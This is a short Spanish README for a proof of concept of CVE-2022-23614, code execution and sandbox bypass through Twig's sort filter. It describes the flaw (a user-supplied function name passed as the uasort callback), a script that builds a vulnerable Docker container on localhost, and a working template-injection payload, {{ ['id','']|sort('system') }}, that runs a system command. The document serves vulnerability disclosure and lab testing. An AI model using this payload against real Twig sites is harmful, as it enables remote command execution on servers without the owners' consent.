
PoC para CVE-2022-23614 (filtro sort de Twig – ejecución de código / bypass de sandbox)
PoC para CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Ejecución de código/filtro sort de Twig y evasión de sandbox)
Como se ve en este commit - https://github.com/twigphp/Twig/commit/.., twig estaba pasando el nombre de una función proporcionada por el usuario como parámetro callback a uasort (aquí), lo que conducía a la ejecución arbitraria de código
Para construir y ejecutar el contenedor docker con una versión vulnerable de twig
$ ./build-docker.sh
Abre la página web en localhost:1337 e intenta renderizar el siguiente payload
{{ ['id','']|sort('system') }}
PoC

Resultado
